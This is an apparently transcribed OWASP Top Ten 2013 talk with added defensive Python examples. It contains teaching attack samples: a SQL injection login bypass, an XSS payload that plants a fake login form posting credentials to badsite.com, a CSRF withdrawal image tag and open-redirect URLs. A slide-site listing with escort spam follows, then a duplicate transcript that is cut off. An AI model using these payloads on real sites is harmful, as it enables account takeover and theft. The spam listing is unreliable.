OWASP

The OWASP Foundation
http://www.owasp.org

The OWASP Top Ten
Most Critical Web Application
Security Risks
2013/12/04

Simon Bennetts
Mozilla Security Team, OWASP ZAP Project Lead
psiinon@gmail.com
Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Top Ten
• Most Critical Web Application Security Risks

Risk rating scale used for each item (Threat Agent and Business Impact are shown as "?" because they depend on the specific application):

Threat Agent | Attack Vector | Weakness Prevalence | Weakness Detectability | Technical Impact | Business Impact
?            | Easy          | Widespread          | Easy                   | Severe           | ?
?            | Average       | Common              | Average                | Moderate         | ?
?            | Difficult     | Uncommon            | Difficult              | Minor            | ?

• A great place to start
• Current list published in 2013
• Well known and well regarded
• But … the vast majority of websites still have a high, critical or urgent issue

2
The OWASP Top Ten
A1: Injection
A2: Broken Authentication and Session Management
A3: Cross-Site Scripting (XSS)
A4: Insecure Direct Object References
A5: Security Misconfiguration
A6: Sensitive Data Exposure
A7: Missing Function Level Access Control
A8: Cross-Site Request Forgery (CSRF)
A9: Using Components with Known Vulnerabilities
A10: Unvalidated Redirects and Forwards

3
A1: Injection
Attack Vector: Easy | Weakness Prevalence: Common | Weakness Detectability: Average | Technical Impact: Severe

• Tricking an application into including unintended commands in the data sent to an interpreter
• SQL, OS Shell, LDAP, XPath, Hibernate…
• Impact: SEVERE!
  • Unauthorized application access
  • Unauthorized data access
  • OS access…
4
A1: Injection

[Diagram: User → Server → Db]

5
A1: Injection (SQL)
• Example UI:
  Name:     admin'--
  Password: *******
  [Login]

• Example code (the deliberately vulnerable string concatenation from the slide):
  String sql = "SELECT * FROM users where username = '" + username + "' and password = '" + password + "'";

• Expected SQL:
  SELECT * FROM users where username = 'admin' and password = 'c0rr3ct'

• Resulting SQL query:
  SELECT * FROM users where username = 'admin'--' and password = 'anything'
  The quote closes the username literal and "--" starts a SQL comment, so the password check is never evaluated.

7
A1: Injection
• Prevention:
  • Use interfaces that provide a parameterized interface:
    • Prepared Statements
    • Stored Procedures
  • Encode all user input
  • Whitelist input
  • Minimize database privileges
• OWASP SQL Injection Prevention Cheat sheet
8
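The slide's login query, run both ways, as an added example (Python with the standard-library sqlite3 driver rather than the slide's Java; not code from the slides or from OWASP). The users table, the `admin`/`c0rr3ct` row and the username whitelist policy are constructed for this example; the `admin'--` input is the one shown on the slide. The plaintext password column only mirrors the slide's query; real systems store password hashes.

```python
import re
import sqlite3


# Constructed stand-in for the slide's "users" table: an in-memory SQLite database
# holding one row. Plaintext passwords are kept only to mirror the slide's query.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'c0rr3ct')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The slide's pattern: input is concatenated into the SQL text, so the quote
    and '--' in the name become SQL syntax and comment out the password check."""
    sql = ("SELECT * FROM users where username = '" + username +
           "' and password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    """Prepared statement: the '?' placeholders are bound by the driver, so the
    input is compared as a literal value and is never parsed as SQL."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# Whitelist check as a second layer in front of the database (assumed username policy).
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.@-]{1,64}$")


def is_valid_username(username):
    return USERNAME_RE.fullmatch(username) is not None


def login(conn, username, password):
    """Whitelist first, then the parameterized query."""
    if not is_valid_username(username):
        return False
    return login_parameterized(conn, username, password)


def demo():
    conn = make_db()
    injected_name = "admin'--"          # the input typed into the slide's Name field
    return {
        "vulnerable_bypassed": login_vulnerable(conn, injected_name, "anything"),
        "parameterized_bypassed": login_parameterized(conn, injected_name, "anything"),
        "parameterized_real_login": login_parameterized(conn, "admin", "c0rr3ct"),
        "whitelist_rejects_injection": not is_valid_username(injected_name),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The vulnerable function accepts the slide's input with any password because SQLite sees `username = 'admin'` followed by a comment; the parameterized function rejects it because the whole string `admin'--` is compared as a username value.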
A2: Broken Authentication and Session Management
Attack Vector: Average | Weakness Prevalence: Widespread | Weakness Detectability: Average | Technical Impact: Severe

• HTTP is stateless
• Session IDs are used to track state, and are as good as credentials to an attacker
• Can be accessed via sniffer, logs, XSS…
• Change my password, forgotten my password, secret questions …
• Impact: sessions hijacked / accounts compromised

9
A2: Broken Authentication and Session Management
• Prevention:
  • Use standard implementations
  • Use SSL for ALL requests
  • Thoroughly test all authentication related functionality
  • Use SECURE & HTTPOnly cookie flags
  • Avoid XSS flaws
10
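A passive check for the cookie flags named on the slide, of the kind a proxy or scanner applies to every response, as an added example (Python, not code from the slides or from ZAP). The Set-Cookie headers and the list of session cookie names are constructed for the example; `hardened_set_cookie` also adds `SameSite=Lax`, which is later advice not on the 2013 slide.

```python
# Constructed Set-Cookie header values, as seen in HTTP responses passing through a proxy.
SAMPLE_HEADERS = [
    "JSESSIONID=1A2B3C4D; Path=/",
    "sessionid=8f3e2c; Path=/; HttpOnly",
    "sessionid=8f3e2c; Path=/; Secure; HttpOnly",
    "theme=dark; Path=/; Max-Age=31536000",
]

# Cookie names treated as session identifiers (assumed list for this example).
SESSION_COOKIE_NAMES = {"jsessionid", "phpsessid", "sessionid", "asp.net_sessionid"}


def parse_set_cookie(header_value):
    """Split one Set-Cookie value into (name, value, {attribute: value}).
    Attribute names are lower-cased; flag attributes get an empty value."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_set_cookie(header_value):
    """Return the hardening flags missing from a session cookie.
    Non-session cookies return an empty list, as does a fully flagged cookie."""
    name, _, attrs = parse_set_cookie(header_value)
    if name.lower() not in SESSION_COOKIE_NAMES:
        return []
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure")      # would be sent over plain HTTP: sniffable
    if "httponly" not in attrs:
        findings.append("missing HttpOnly")    # readable by script injected via XSS
    return findings


def audit_response(headers):
    """Map each session cookie with findings to its list of missing flags."""
    report = {}
    for header in headers:
        findings = audit_set_cookie(header)
        if findings:
            report[parse_set_cookie(header)[0]] = findings
    return report


def hardened_set_cookie(name, value, max_age=1800):
    """Build a Set-Cookie header carrying the flags the slide asks for.
    SameSite=Lax is later advice, not on the 2013 slide."""
    return f"{name}={value}; Path=/; Max-Age={max_age}; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    for cookie, missing in audit_response(SAMPLE_HEADERS).items():
        print(f"{cookie}: {', '.join(missing)}")
    print(hardened_set_cookie("sessionid", "8f3e2c"))
```

Run over the sample headers, the audit reports `JSESSIONID` as missing both flags and the first `sessionid` as missing `Secure`; the `theme` cookie is ignored because it does not carry a session.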
A3: Cross Site Scripting (XSS)
Attack Vector: Average | Weakness Prevalence: VERY Widespread | Weakness Detectability: Easy | Technical Impact: Moderate

• Injecting malicious content/code into web pages
• HTML / JavaScript most common, but many other technologies are also vulnerable:
  • Java, ActiveX, Flash, RSS, Atom, …
• Present in 68% of all web applications in 2011
• Can be present in form and URL parameters AND cookies

11
A3: Cross Site Scripting (XSS)
• Impact:
  • Session hijacking
  • Unauthorized data access
  • Web page rewriting
  • Redirect users (eg to phishing or malware sites)
  • Anything the web application can do…

12
A3: Cross Site Scripting (XSS)
[Diagram: Reflected XSS and Persistent XSS]

13
A3: Cross Site Scripting (XSS)
[Diagram: DOM XSS]

14
A3: Cross Site Scripting (XSS)
• Forum: “Have you seen XYZ are being taken over?? http://tinyurl/jdfgshr”

[Screenshot: XYZ search page, browser title "XYZ – We’re being taken over!", at
https://www.xyz.com/s=%3C%2Fdiv%3E%E2%80%9C%3Cscript%3Edocument.title%3D%E2%80%98XYZ%20 (URL truncated on the slide)]
Search this site:
Yes, we’re being taken over, but don’t worry: login to find out why this is a good thing!
Username:
Password:
[Login]

15
A3: Cross Site Scripting (XSS) found!

[Screenshot: the same page with the injected script removed, browser title "XYZ – No Search Result", at
https://www.xyz.com/s=%3C%2Fdiv%3E%E2%80%9C%3Cscript%3Edocument.title%3D%E2%80%98XYZ%2 (URL truncated on the slide)]
Search this site:
No search result found for:
"</div><script>document.title='XYZ – We’re being taken over!';
document.getElementById('results').style.display='none';
</script> Yes, we’re being taken over, but don’t worry:
login to find out why this is a good thing! <table><form
action='http://badsite.com/gotcha'>
<tr><td>Username:</td><td><input id='user'></td></tr>
<tr><td>Password:</td><td><input id='password' type=…"

16
A3: Cross Site Scripting (XSS)
• View Source:

:
<div id="results">
<p>No search result found for: </p>
<!-- start of users search term --> "
</div><script>document.title='XYZ – We’re being taken over!';
document.getElementById('results').style.display='none';
</script>
Yes, we’re being taken over, but don’t worry:
login to find out why this is a good thing! <table><form
action='http://badsite.com/gotcha'>
<tr><td>Username:</td><td><input id='user'></td></tr>
<tr><td>Password:</td><td><input id='password' type=…
" <!-- end of users search term -->
:

17
A3: Cross Site Scripting (XSS)
• Prevention:
  • Whitelist input
  • Encode output (e.g. using OWASP ESAPI)
  • Don’t output user supplied input 
  • If you must support user supplied HTML, use libraries like OWASP’s AntiSamy
• OWASP XSS Prevention Cheat sheet

18
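The search-results page from the screenshots rendered with and without output encoding, as an added example (Python's standard `html.escape` standing in for the ESAPI encoder the slide names; not code from the slides or from OWASP). The page template, the shortened search term and the whitelist policy for search terms are constructed for the example.

```python
import html
import re

# Shortened form of the search term shown in the slide's screenshot (constructed).
SLIDE_SEARCH_TERM = "\"</div><script>document.title='XYZ - taken over';</script>"


def render_results_vulnerable(term):
    """The page on the slide: the search term is copied into the HTML untouched,
    so its tags close the results div and start a script block."""
    return f'<div id="results"><p>No search result found for: </p>{term}</div>'


def render_results(term):
    """Output encoding for HTML body context: html.escape turns <, >, &, " and '
    into entities, so the term is displayed as text instead of parsed as markup."""
    return f'<div id="results"><p>No search result found for: </p>{html.escape(term)}</div>'


def render_search_box(term):
    """Attribute context: quote=True encodes the quote characters that would
    otherwise end the value="..." attribute and let new attributes be added."""
    return f'<input name="s" value="{html.escape(term, quote=True)}">'


# Whitelist (assumed policy for this search form): word characters, spaces and basic punctuation.
SEARCH_TERM_RE = re.compile(r"^[\w .,!?-]{1,100}$")


def is_valid_search_term(term):
    return SEARCH_TERM_RE.fullmatch(term) is not None


def tag_count(markup):
    """Count the HTML tags a browser would parse in the rendered output.
    Escaped text contains no '<', so only the template's own tags are counted."""
    return len(re.findall(r"<[a-zA-Z/][^>]*>", markup))


if __name__ == "__main__":
    print(tag_count(render_results_vulnerable(SLIDE_SEARCH_TERM)), "tags without encoding")
    print(tag_count(render_results(SLIDE_SEARCH_TERM)), "tags with encoding")
    print(render_results(SLIDE_SEARCH_TERM))
```

The template itself contributes four tags; the unencoded rendering adds the three tags carried by the search term, while the encoded rendering shows the term verbatim to the user and adds none. Encoding is chosen per output context (body text versus attribute value), which is why the two render functions differ.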
A4: Insecure Direct Object Reference
Attack Vector: Easy | Weakness Prevalence: Common | Weakness Detectability: Easy | Technical Impact: Moderate

• A direct reference to an object that is not validated on each request
  • user=psiinon@gmail.com
  • company=Mega%20Corp
  • account=7352820
• Typically in FORM and URL parameters (cookies less likely)
• Impact: accounts and data compromised
19
A4: Insecure Direct Object Reference
• Attacker notices URL: acct=6065
• Modifies it to acct=6066
• Attacker can view (and maybe change?) the victim’s account

20
A4: Insecure Direct Object Reference
• Prevention:
  • Use per user or per session indirect object references (ESAPI supports integer and random mapping)
  • Validate Direct Object References on each request

21
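Both preventions from the slide applied to the `acct=6065` / `acct=6066` scenario, as an added example (Python; an illustration in the spirit of ESAPI's random access reference map, not ESAPI's code and not from the slides). The account ownership table and the user names are constructed for the example.

```python
import secrets

# Constructed ownership data: the slide's two accounts and who may see each one.
ACCOUNT_OWNERS = {"6065": "alice", "6066": "bob"}


class AccessReferenceMap:
    """Per-session random indirect references. The browser only ever sees a
    random token; the real account number stays on the server."""

    def __init__(self):
        self._to_indirect = {}
        self._to_direct = {}

    def add(self, direct):
        if direct not in self._to_indirect:
            token = secrets.token_urlsafe(12)   # unguessable, unlike 6065 -> 6066
            self._to_indirect[direct] = token
            self._to_direct[token] = direct
        return self._to_indirect[direct]

    def resolve(self, indirect):
        """Anything not registered for this session is refused: a raw account
        number, a guessed token, or a token issued to another user's session."""
        if indirect not in self._to_direct:
            raise PermissionError("unknown object reference")
        return self._to_direct[indirect]


def build_session_map(user):
    """At login, register only the objects this user is entitled to."""
    refs = AccessReferenceMap()
    for acct, owner in ACCOUNT_OWNERS.items():
        if owner == user:
            refs.add(acct)
    return refs


def view_account_direct(user, acct):
    """The slide's alternative: keep the direct reference but validate ownership
    on every request, never assuming the URL came from our own UI."""
    if ACCOUNT_OWNERS.get(acct) != user:
        raise PermissionError("account not owned by requester")
    return acct


def rejected(func, *args):
    """True if the call is refused with PermissionError."""
    try:
        func(*args)
    except PermissionError:
        return True
    return False


def demo():
    alice_refs = build_session_map("alice")
    bob_refs = build_session_map("bob")
    alice_token = alice_refs.add("6065")       # the value alice's pages would carry
    bob_token = bob_refs.add("6066")
    return {
        "own_token_resolves": alice_refs.resolve(alice_token) == "6065",
        "raw_id_rejected": rejected(alice_refs.resolve, "6066"),
        "other_users_token_rejected": rejected(alice_refs.resolve, bob_token),
        "direct_own_ok": view_account_direct("alice", "6065") == "6065",
        "direct_tampered_rejected": rejected(view_account_direct, "alice", "6066"),
    }


if __name__ == "__main__":
    for check, passed in demo().items():
        print(f"{check}: {passed}")
```

With the indirect map, changing the parameter in the URL yields a token the session never issued, so there is nothing to resolve; with direct references the ownership check has to run on every request, which is exactly the step the slide says is missing.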
A5: Security Misconfiguration
Attack Vector: Easy | Weakness Prevalence: Common | Weakness Detectability: Easy | Technical Impact: Moderate

• Another multitude of sins 
• Server / Application configuration
• Lack of server and application hardening
• Unpatched OS, services, libraries
• Default accounts
• Detailed error messages (e.g. stack traces)
• Unprotected files and directories
22
A5: Security Misconfiguration
• Impact:
  • Server compromise
  • Exploitation of known vulnerabilities
• Prevention:
  • Repeatable server and application hardening process
  • Patch OS, services, libraries
  • Strong architecture that ensures secure separation between components

23
A6: Sensitive Data Exposure
Attack Vector: Difficult | Weakness Prevalence: Uncommon | Weakness Detectability: Average | Technical Impact: Severe

• Exposure of:
  • Credentials
  • Credit card numbers
  • Bank account details
  • Any sensitive data…
• In: Databases, Files, Logs, Backups …

24
A6: Sensitive Data Exposure
• Impact:
  • Attackers access or modify sensitive data
  • Attackers use sensitive data in further attacks
  • Company embarrassment, loss of trust
  • Company sued or fined

25
A6: Sensitive Data Exposure
• Prevention:
  • Identify sensitive data
  • Store as little sensitive data as possible 
  • Protect with suitable mechanisms (file, db, element encryption, SSL)
  • Only use standard, well recognised algorithms
  • Check your implementation!
26
A7: Missing Function Level Access Control
Attack Vector: Easy | Weakness Prevalence: Common | Weakness Detectability: Average | Technical Impact: Moderate

• UI showing navigation to unauthorized functions
• Server side authentication or authorization checks missing
• Server side checks relying solely on attacker provided information
• Impact:
  • Unauthorized account and data access
  • Access to administrative functionality
27
A7: Missing Function Level Access Control
• Prevention:
  • Process for managing entitlements that’s easy to update and audit
  • Deny access by default, require specific grants to specific roles for access to every function
  • Check workflow for correct state

28
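A deny-by-default entitlement check, alongside the "relying solely on attacker provided information" anti-pattern from the previous slide, as an added example (Python; not code from the slides). The grants table, function names, roles and sessions are constructed for the example.

```python
# Entitlement table: the single place that records which roles may call which
# function (constructed for this example). Anything not listed here is denied.
GRANTS = {
    "view_account":  {"customer", "staff", "admin"},
    "edit_account":  {"staff", "admin"},
    "admin_console": {"admin"},
}


def is_allowed(function_name, role):
    """Deny by default: an unknown function or an unlisted role both yield False."""
    return role in GRANTS.get(function_name, set())


def dispatch_insecure(function_name, params):
    """The anti-pattern from the slide: the server-side check relies solely on
    attacker-provided information, here a 'role' request parameter that any
    client can set to whatever it likes."""
    return is_allowed(function_name, params.get("role", "customer"))


def dispatch(function_name, params, session):
    """The role comes from the server-side session created at login; request
    parameters play no part in the decision. No session means unauthenticated,
    which is also a denial."""
    if not session or "role" not in session:
        return False
    return is_allowed(function_name, session["role"])


def demo():
    tampered = {"role": "admin"}                    # what a client might send
    customer_session = {"user": "alice", "role": "customer"}
    admin_session = {"user": "root", "role": "admin"}
    return {
        "insecure_escalation": dispatch_insecure("admin_console", tampered),
        "secure_blocks_tampering": dispatch("admin_console", tampered, customer_session),
        "secure_admin_allowed": dispatch("admin_console", {}, admin_session),
        "unknown_function_denied": dispatch("export_everything", {}, admin_session),
        "unauthenticated_denied": dispatch("view_account", {}, None),
    }


if __name__ == "__main__":
    for check, outcome in demo().items():
        print(f"{check}: {outcome}")
```

Because every function must appear in `GRANTS` to be reachable at all, adding a new function without an entry fails closed, and the table doubles as the auditable record of entitlements the slide asks for.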
A8: Cross site request forgery
Attack Vector: Average | Weakness Prevalence: Common | Weakness Detectability: Easy | Technical Impact: Moderate

• Exploits sessions established in other browser windows or tabs
• Impact: Attacker can perform any action on behalf of the victim

29
A8: Cross site request forgery

[Diagram: the victim’s Browser has a session with example.bank.com ($$$) and also loads a page from bad.site.com containing an <img src="…"> tag; numbered steps 1–5 show the browser fetching the image URL from the bank with the victim’s session]

<img src="https://example.bank.com/withdraw?account=bob&amount=1000000&for=mallory">

30
A8: Cross site request forgery
• Prevention:
  • Never allow GETs to change things
  • Anti CSRF tokens
    • Viewstate (ASP.NET)
    • OWASP CSRF Guard
  • Challenge-Response
    • Re-Authentication
    • CAPTCHA
31
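The first two preventions on the slide applied to the `withdraw` request from the diagram, as an added example (Python; a per-session token scheme of the kind CSRF Guard provides, not CSRF Guard's or the slides' code). The handler, the session dictionary and the response codes are constructed for the example; the image URL is the one on the slide.

```python
import hmac
import secrets
from urllib.parse import parse_qsl, urlsplit

# The URL carried by the <img> tag on the slide.
SLIDE_IMG_URL = "https://example.bank.com/withdraw?account=bob&amount=1000000&for=mallory"


def issue_csrf_token(session):
    """One random token per session, kept server-side and embedded in every form."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def csrf_hidden_field(session):
    """The hidden input a legitimate withdraw form would carry."""
    return f'<input type="hidden" name="csrf_token" value="{issue_csrf_token(session)}">'


def handle_withdraw(method, params, session):
    """Server-side handler for /withdraw. Returns (status, message)."""
    # Never allow GETs to change things: a GET is exactly what an <img src=...> sends.
    if method != "POST":
        return 405, "state-changing requests must use POST"
    expected = session.get("csrf_token")
    supplied = params.get("csrf_token", "")
    # Constant-time comparison; a session without a token also fails.
    if not expected or not hmac.compare_digest(expected, supplied):
        return 403, "missing or invalid CSRF token"
    return 200, f"transfer {params['amount']} from {params['account']} to {params['for']}"


def request_from_url(url):
    """Model the browser fetching an image: a GET with the query string as parameters."""
    return "GET", dict(parse_qsl(urlsplit(url).query))


def demo():
    session = {"user": "bob"}                   # the victim's logged-in session (constructed)
    method, params = request_from_url(SLIDE_IMG_URL)
    forged_get = handle_withdraw(method, params, session)
    # A forged POST from another site cannot include a token it has never been shown.
    forged_post = handle_withdraw("POST", params, session)
    legit_params = dict(params, csrf_token=issue_csrf_token(session))
    legit_post = handle_withdraw("POST", legit_params, session)
    return forged_get[0], forged_post[0], legit_post[0]


if __name__ == "__main__":
    print(demo())
```

The forged image request fails on the method check alone, a forged POST fails on the token check, and only a form rendered by the application itself (which carries `csrf_hidden_field`) is accepted. Note that issuing the token lazily means a session that has never rendered a form has no token and therefore rejects every POST.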
A9: Using Components with Known Vulnerabilities
Attack Vector: Average | Weakness Prevalence: Widespread | Weakness Detectability: Difficult | Technical Impact: Moderate

• As per the title!
• Impact:
  • Full range of weaknesses, including injection, broken access control, XSS …
  • Minimal → complete host takeover and data compromise

32
A9: Using Components with Known Vulnerabilities
• Prevention:
  • Identify all components and versions in use
  • Monitor security of these components
  • Keep components up to date
  • Establish security policies governing use
  • If necessary add wrappers to disable unused or vulnerable aspects of components

33
A10: Unvalidated Redirects and Forwards
Attack Vector: Average | Weakness Prevalence: Uncommon | Weakness Detectability: Easy | Technical Impact: Moderate

• Redirects are common and send the user to a new site .. which could be malicious if not validated!
  http://fail.com/redir.php?url=badsite.com
• Forwards (Transfers) send the request to a new page in the same application .. which could bypass authentication or authorization
  http://fail.com/redir.php?url=admin.php
34
A10: Unvalidated Redirects and Forwards
• Impact:
  • Redirect victim to phishing or malware site
  • Attacker’s request is forwarded past security checks, allowing unauthorized function or data access
• Prevention:
  • Avoid using them
  • Don’t use user supplied data for destination
  • Validate any user data that must be used
35
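Validation for the `redir.php?url=` parameter from the previous slide, covering both the redirect and the forward case, as an added example (Python, not code from the slides). The allowlist of hosts, the forward key table and the default destination are constructed for the example; `fail.com`, `badsite.com` and `admin.php` are the names used on the slide. It goes a little beyond the slide's two inputs by also handling scheme-relative, backslash and `user@host` forms of the URL, which browsers accept but a naive check misses.

```python
from urllib.parse import urlsplit

# Hosts this application may redirect to (assumed allowlist for the slide's fail.com).
ALLOWED_REDIRECT_HOSTS = {"fail.com", "www.fail.com"}

# Forwards: the user supplies a key, never a file name, so admin.php is unreachable here.
FORWARD_TARGETS = {"home": "home.php", "help": "help.php"}


def safe_redirect_target(target, allowed_hosts=ALLOWED_REDIRECT_HOSTS, default="/"):
    """Return a redirect destination that is either a rooted local path or an https
    URL on an allowed host; anything else falls back to the default page."""
    if not target:
        return default
    # Browsers treat backslashes as slashes, so normalise before parsing:
    # "/\\host" must be recognised as the scheme-relative "//host".
    candidate = target.strip().replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme == "" and parts.netloc == "":
        # Relative URL: require exactly one leading slash ("//host" has a netloc and
        # never reaches this branch; "badsite.com" is a bare word, not a rooted path).
        if candidate.startswith("/") and not candidate.startswith("//"):
            return candidate
        return default
    # Absolute URL: https only, exact host match, and no "allowed@evil" userinfo trick.
    if parts.scheme == "https" and parts.username is None and parts.hostname in allowed_hosts:
        return candidate
    return default


def resolve_forward(key, default="home.php"):
    """Map a user-chosen key to a page; unknown keys get the default rather than the key."""
    return FORWARD_TARGETS.get(key, default)


if __name__ == "__main__":
    for url in ("badsite.com", "//badsite.com/", "/account?tab=1", "https://fail.com/home"):
        print(f"{url!r:>28} -> {safe_redirect_target(url)!r}")
    print("admin.php ->", resolve_forward("admin.php"))
```

The slide's `url=badsite.com` is rejected because a bare host name is not a rooted path, and `url=admin.php` never reaches the file system because forwards resolve through a fixed key table. The cleanest option on the slide, avoiding user-supplied destinations altogether, is the key-table approach applied to redirects as well.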
Where Next?
• Read and understand the full document!
• Read the OWASP Developers Guide
• Watch the OWASP AppSec Tutorial videos on YouTube
• Re-examine your code!
• Introduce a Secure Development Lifecycle
• Use tools like the OWASP Zed Attack Proxy 

36
Any Questions?
https://www.owasp.org/index.php/Top_10_2013

Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 

The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20

1. The OWASP Top Ten: Most Critical Web Application Security Risks
OWASP, The OWASP Foundation, http://www.owasp.org
2013/12/04
Simon Bennetts, Mozilla Security Team, OWASP ZAP Project Lead, psiinon@gmail.com
Copyright © The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.

2. The OWASP Top Ten
• Most Critical Web Application Security Risks
Risk rating factors (Threat Agent and Business Impact depend on the application, shown as ?):
Threat Agent | Attack Vector | Weakness Prevalence | Weakness Detectability | Technical Impact | Business Impact
?            | Easy          | Widespread          | Easy                   | Severe           | ?
?            | Average       | Common              | Average                | Moderate         | ?
?            | Difficult     | Uncommon            | Difficult              | Minor            | ?
• A great place to start
• Current list published in 2013
• Well known and well regarded
• But … the vast majority of websites still have a high, critical or urgent issue

3. The OWASP Top Ten
A1: Injection
A2: Broken Authentication and Session Management
A3: Cross-Site Scripting (XSS)
A4: Insecure Direct Object References
A5: Security Misconfiguration
A6: Sensitive Data Exposure
A7: Missing Function Level Access Control
A8: Cross-Site Request Forgery (CSRF)
A9: Using Components with Known Vulnerabilities
A10: Unvalidated Redirects or Forwards

4. A1: Injection
Attack Vector: Easy | Weakness Prevalence: Common | Weakness Detectability: Average | Technical Impact: Severe
• Tricking an application into including unintended commands in the data sent to an interpreter
• SQL, OS Shell, LDAP, XPath, Hibernate…
• Impact: SEVERE!
• Unauthorized application access
• Unauthorized data access
• OS access…

6. A1: Injection (SQL)
• Example UI:
  Name: admin '--
  Password: *******
  Login
• Example code:
  String sql = "SELECT * FROM users where username = '" + username + "' and password = '" + password + "'";
• Expected SQL:
  SELECT * FROM users where username = 'admin' and password = 'c0rr3ct'

7. A1: Injection (SQL)
• Example UI:
  Name: admin '--
  Password: *******
  Login
• Example code:
  String sql = "SELECT * FROM users where username = '" + username + "' and password = '" + password + "'";
• Expected SQL:
  SELECT * FROM users where username = 'admin' and password = 'c0rr3ct'
• Resulting SQL query (everything after -- is a comment, so the password check is never evaluated):
  SELECT * FROM users where username = 'admin'--' and password = 'anything'

8. A1: Injection
• Prevention:
  • Use interfaces that provide a parameterized interface:
    • Prepared Statements
    • Stored Procedures
  • Encode all user input
  • Whitelist input
  • Minimize database privileges
• OWASP SQL Injection Prevention Cheat Sheet
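The login query from slides 6 to 8 run both ways against a constructed in-memory SQLite table: the concatenated form that the admin'-- name bypasses, beside the prepared-statement form from slide 8 that treats the same input as data. This is an added example, not code from the deck; the table and the login_vulnerable / login_parameterized functions are assumptions made for it.

```python
import sqlite3


def make_db():
    """Constructed users table standing in for the deck's 'users'. The
    password is stored in the clear only to keep the injection visible;
    a real application stores a salted hash."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'c0rr3ct')")
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """Slide 6's pattern: the query is built by string concatenation, so the
    database cannot tell attacker-supplied text from SQL syntax."""
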